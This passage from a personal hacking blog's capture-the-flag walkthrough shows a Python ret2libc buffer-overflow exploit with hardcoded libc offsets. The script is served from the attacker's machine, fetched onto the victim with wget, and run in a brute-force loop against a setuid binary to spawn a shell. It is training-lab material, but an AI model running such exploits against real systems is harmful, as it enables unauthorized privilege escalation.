<span class="n">libc_addr</span> <span class="o">=</span> <span class="mh">0xb7565000</span> <span class="c1"># Although this value is changing, as I said, after a while this value will repeat.</span>
<span class="n">system_offset</span> <span class="o">=</span> <span class="mh">0x00040310</span>
<span class="n">exit_offset</span> <span class="o">=</span> <span class="mh">0x00033260</span> <span class="c1"># &lt;- This doesn&#39;t really matter...</span>
<span class="n">bin_sh_offset</span> <span class="o">=</span> <span class="mh">0x00162bac</span>

<span class="n">system</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&lt;I&#34;</span><span class="p">,</span> <span class="n">libc_addr</span> <span class="o">+</span> <span class="n">system_offset</span><span class="p">)</span>
<span class="nb">exit</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&lt;I&#34;</span><span class="p">,</span> <span class="n">libc_addr</span> <span class="o">+</span> <span class="n">exit_offset</span><span class="p">)</span> 
<span class="n">bin_sh</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&lt;I&#34;</span><span class="p">,</span> <span class="n">libc_addr</span> <span class="o">+</span> <span class="n">bin_sh_offset</span><span class="p">)</span>

<span class="n">payload</span> <span class="o">=</span> <span class="n">trash</span> <span class="o">+</span> <span class="n">system</span> <span class="o">+</span> <span class="nb">exit</span> <span class="o">+</span> <span class="n">bin_sh</span>

<span class="k">print</span> <span class="n">payload</span>
</code></pre></div><p>Get it into the machine :</p>
<h3 id="from-our-local-machine--1">From our local machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server"  target="_blank" rel="noopener"
    >python3 -m http.server</a></p>
</blockquote>
<h3 id="from-the-victim-machine--2">From the victim machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=wget&#43;10.10.14.18%3A8000%2Fscript.py"  target="_blank" rel="noopener"
    >wget 10.10.14.18:8000/script.py</a></p>
</blockquote>
<p>Once here we can brute force the libc_addr, let&rsquo;s run this :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=for&#43;i&#43;in&#43;%24%28seq&#43;100%29%3B&#43;do&#43;.%2F..%2Fusr%2Flocal%2Fbin%2Fovrflw&#43;%24%28python&#43;script.py%29%3Bdone"  target="_blank" rel="noopener"
    >for i in $(seq 100); do ./../usr/local/bin/ovrflw $(python script.py);done</a></p>
</blockquote>
<p>And now we just have to wait&hellip; :clock:</p>
<p><img src="/static/HACKING/october-28.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="thanks-for-reading--">THANKS FOR READING 😊 !!</h1>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>

    
</article>

     
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (DISQUS) {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2021 Maikypedia
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="2.3.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>

    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer="true"
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer="true"
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css"integrity="sha256-c0uckgykQ9v5k&#43;IqViZOZKc47Jn7KQil4/MP3ySA3F8="crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.css"integrity="sha256-SBLU4vv6CA6lHsZ1XyTdhyjJxCjPif/TRkjnsyGAGnE="crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.5/dist/vibrant.min.js"integrity="sha256-5NovOZc4iwiAWTYIFiIM7DxKUXKWvpVEuMEPLzcm5/g="crossorigin="anonymous"
                defer="false"
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
